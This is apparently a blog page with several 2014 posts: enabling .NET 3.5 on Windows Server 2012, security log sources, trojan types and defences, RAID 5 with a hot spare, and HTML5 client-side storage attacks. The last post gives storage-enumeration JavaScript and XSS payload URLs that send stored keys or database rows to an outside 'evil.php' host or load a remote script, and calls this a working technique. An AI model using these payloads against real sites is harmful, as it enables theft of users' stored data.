Enabling .Net Framework 3.5 in Windows Server 2012 using Command prompt

by | Nov 30, 2014 | Howtos, OS, Servers, Troubleshooting, Windows

Enabling .Net Framework 3.5 in Windows Server 2012 using Command prompt 

You need

  1. Media of Windows Server 2012

insert your media in your dvd drive or mound it via iLo or pendrive

please not your drive letter which is assigned to that media

now open up your command prompt

press windows key and R key same time now run windows will appear  , now  type CMD  then press enter 

this will open your command prompt

now mound your drive letter

in this case my drive letter is  ”  D   “

so i need to type D: in the command prompt

now type following command

dism /online /enable-feature /featurename:NetFx3 /All /Source:d:/sources/sxs

Note*  in command line letter d may vary 

now wait for some time

done !

lets check on server manager

restart your server 

good luck 

Some Security Softwares

by | Nov 27, 2014 | Uncategorized

Most organizations use several types of network-based
and host-based :


security software to detect malicious activity, protect systems and data, and support incident response efforts. Accordingly, security software is a major source of computer security log data. Common types of network-based and host-based security software include the following 

Network Quarantine Servers : Some organizations check each remote host’s security posture before allowing it to join the network. This is often done through a network quarantine server and agents placed on each host. Hosts that do not respond to the server’s checks or that fail the checks are quarantined on a separate virtual local area network segment. Network quarantine servers log information about the status of checks, including which hosts were quarantined and for what reasons.

Routers : Routers may be configured to permit or block certain types of network traffic based on a policy. Routers that block traffic are usually configured to log only the most basic characteristics of blocked activity.

Web Proxies : Web proxies are intermediate hosts through which Web sites are accessed. Web proxies make Web page requests on behalf of users, and they cache copies of retrieved Web pages to make additional accesses to those pages more efficient. Web proxies can also be used to restrict Web access and to add a layer of protection between Web clients and Web servers. Web proxies often keep a record of all URLs accessed through them.

Vulnerability Management Software Vulnerability management software, which includes patch management software and vulnerability assessment software, typically logs the patch installation history and vulnerability status of each host, which includes known vulnerabilities and missing software updates.5 Vulnerability management software may also record additional information about hosts’ configurations. Vulnerability management software typically runs occasionally, not continuously, and is likely to generate large batches of log entries.

Remote Access Software : Remote access is often granted and secured through virtual private networking (VPN). VPN systems typically log successful and failed login attempts, as well as the dates and times each user connected and disconnected, and the amount of data sent and received in each user session. VPN systems that support granular access control, such as many Secure Sockets Layer (SSL) VPNs, may log detailed information about the use of resources.

Antimalware Software : The most common form of antimalware software is antivirus software, which typically records all instances of detected malware, file and system disinfection attempts, and file quarantines. 3 Additionally, antivirus software might also record when malware scans were performed and when antivirus signature or software updates occurred. Antispyware software and other types of antimalware software (e.g., rootkit detectors) are also common sources of security information.

Intrusion Detection and Intrusion Prevention Systems : Intrusion detection and intrusion prevention systems record detailed information on suspicious behavior and detected attacks, as well as any actions intrusion prevention systems performed to stop malicious activity in progress. Some intrusion detection systems, such as file integrity checking software, run periodically instead of continuously, so they generate log entries in batches instead of on an ongoing basis.

Firewalls : Like routers, firewalls permit or block activity based on a policy; however, firewalls use much more sophisticated methods to examine network traffic.6 Firewalls can also track the state of network traffic and perform content inspection. Firewalls tend to have more complex policies and generate more detailed logs of activity than routers.

Authentication Servers : Authentication servers, including directory servers and single sign-on servers, typically log each authentication attempt, including its origin, username, success or failure, and date and time.
 

credits : wikipedia

Network Threat : The Trojan Horse

by | Nov 21, 2014 | Networking

What is a Trojan Horse ?

A trojan horse is used to enter a victim’s computer, granting the attacker ‘wrapped’ into a program meaning that this program may therefore have hidden fuctions that you are not aware of.
unrestricted access to the data stored on that computer and causing great damage to the victim. A trojan can be a hidden program that runs on your system  without your information,
or it can be

Different types of trojans :

1) FTP torjans : These trojans open an FTP server on the victim’s machine that might store and serve illegal software and/or sensitive data, and allow attackers to connect to your machine via FTP.

2) Destructive trojans : The only function of these trojans is to destroy and delete files. This makes them very simple to use. They can automatically delete all the core system files on your machine. The trojan can either be activated by the attacker or can work like a logic bomb that starts on a specific day and time.
A destructive trojan is a danger to any computer network. In many ways, it is similar to a virus, but thedestructive trojan has been created purposely to attack you, and therefore is unlikely to be detected by your antivirus software.

3) Proxy trojans : These trojans turn the victim’s computer into a proxy server, making it available to the whole world or to the attacker alone. It is used for anonymous Telnet, ICQ, etc., to make purchases with stolen credit cards, and for other such illegal activities. This gives the attacker complete anonymity and the opportunity to do everything from YOUR computer, including the possibility to launch attacks from your network.
  
4) Denial of Servce (DoS) attack trojans : These trojans give the attacker the power to start a Distributed Denial of Service  attack if there are enough victims. The main idea is that if you have 500 infected ADSL users and you attack the victim simultaneously from each, this will generate HEAVY traffic, causing its access to the Internet to shut down.

5) Security software disablers : These are special trojans, designed to stop/kill programs such as antivirus software, firewalls, etc. Once these programs are disabled, the hacker is able to attack your machine more easily.

6) Data-sending trojans : The purpose of these trojans is to send data back to the hacker with information such as passwords (ICQ, IRC, FTP, HTTP) or confidential information such as chat logs, address lists, etc. The trojan could look for specific information in particular locations or it could install a key-logger and simply send all recorded keystrokes to the hacker.



7) Remote access trojans :  These are probably the most publicized trojans, because they provide the attacker with total control of the victim’s machine. Example : Back Orifice trojans. The idea behind them is to give the attacker COMPLETE access to someone’s machine, and therefore full access to files, private conversations, accounting data, etc. Some trojans can also automatically connect to IRC and can be controlled through IRC commands almost anonymously, without the attacker and the victim ever making a real TCP/IP connection.

Another question : How can I get infected ?
Generally, attack are being done through :

1) Infection via attachment ( of course emails : the most common way )

2) Infection by downloading files from a website (another common way )

Now most important thing, how to protect your network from trojans ?

Ok, if you think that anti-viruses are really helpful and they’ll protect your system and network  from trojan attacks, then you are wrong. Anti-viruses just help us to some extent.
To effectively protect your network against trojans, you must follow a multi-level security strategy:

1. You need to implement gateway virus scanning and content checking at the perimeter of your network for email, HTTP and FTP – It is no good having email anti-virus protection, if a user can download a trojan from a website and infect your network.

2. You need to implement multiple virus engines at the gateway – Although a good virus engine usually detects all known viruses, it is a fact that multiple virus engines jointly recognize many more known trojans than a single engine.

3. You need to quarantine/check executables entering your network via email and web/FTP at the gateway. You have to analyze what the executable might do.

4. Do not open unsolicited attachments in email messages.

5. Do not follow unsolicited links.

6. Maintain updated anti-virus software.

7. Use an Internet firewall.

8. Securing your web browser.

9. Keep your system patched.

Good Luck !!

Configuring Raid 5 With 1 Hot Spare in HP Proliant ML310e Gen8

by | Nov 20, 2014 | Howtos, Servers

What is RAID 5

f

RAID 5 comprises block-level striping with distributed parity. Unlike in RAID 4, parity information is distributed among the drives. It requires that all drives but one be present to operate. Upon failure of a single drive, subsequent reads can be calculated from the distributed parity such that no data is lost. RAID 5 requires at least three disks.
In comparison to RAID 4, RAID 5’s distributed parity evens out the stress of a dedicated parity disk among all RAID members. Additionally, read performance is increased since all RAID members participate in serving of the read requests.

Diagram of a RAID 5 setup with distributed parity with each color representing the group of blocks in the respective parity block (a stripe). This diagram shows left asymmetric algorithm

HOT SPARE

hot spare disk is a disk or group of disks used to automatically or manually, depending upon the hot spare policy, replace a failing or failed disk in a RAID configuration.

The hot spare disk reduces the mean time to recovery (MTTR) for the RAID redundancy group, thus reducing the probability of a second disk failure and the resultant data loss that would occur in any singly redundant RAID (e.g., RAID-1, RAID-5, RAID-10). Typically, a hot spare is available to replace a number of different disks and systems employing a hot spare normally require a redundant group to allow time for the data to be generated onto the spare disk. During this time the system is exposed to data loss due to a subsequent failure, and therefore the automatic switching to a spare disk reduces the time of exposure to that risk compared to manual discovery and implementation.

The concept of hot spares is not limited to hardware, but also software systems can be held in a state of readiness, for example a database server may have a software copy on hot standby, possibly even on the same machine to cope with the various factors that make a database unreliable, such as the impact of disc failure, poorly written queries or database software errors. 

Client-side Storage using HTML5, really secure or just an abuse ?

by | Nov 20, 2014 | Howtos, HTML, Programming, Storages

HTML5 has introduced some new ways to save huge amount of data on the PC through the browser (use chromium or chrome to see how this work) Hakcers could steal or modify sensitive data online or offline. If a web application which uses this kind of storage ( client-side ) is vulnerable to XSS attacks we can use an attack payload to read or modify the content of known storage keys on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it.

Working technique : ( 100% working technique, i got success while doing this, you just have to use your brain )

Storage Object Enumeration

var ss = “”;
for(i in window.sessionStorage)
{
ss += i + ” “;
}
var ls = “”;
for(i = 0; i < localStorage.length; i++)
 {
ls += localStorage.key(i) + ” “;
 }

Database Object Enumeration

var db = “”;
for(i in window)
{
if(window[i] == “[object Database]”)
{
db += i + “ “;
}
}

Extracting Database Metadata

SELECT name FROM sqlite_master WHERE type=’table’
SELECT sql FROM sqlite_master WHERE name=’table_name’
SELECT sqlite_version()

One Shot Attack :

http://blah_blah.com/page.php?name=<script>document.write(‘<img
src=”http://foo.com/ evil.php?name=’ %2B globalStorage[location.hostname].mykey %2B ‘”>’);</script>

http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql (“SELECT * FROM client_tb”, [], function(tx, result){ document.write(‘<img src=”http:// foo.com/evil.php?name=’ %2B result.rows.item(0)[‘col_data’] %2B ‘”>’); }); });</script>

http://example.com/page.php?name=<script src=http://foo.com/evil.js>
</script>


Defenses
Website: Avoid saving sensitive data on the users machine and clear
the client-side storage whenever possible.

Web Browser: Web users should check regularly the content of the
HTML5 client-side storage saved by their browser (delete?).

LSO Storage Locations: ( i know only for linux, not a windows user unfortunately :p )

Linux :

/home/$user/.macromedia/Flash_Player/#SharedObjects

Pin It on Pinterest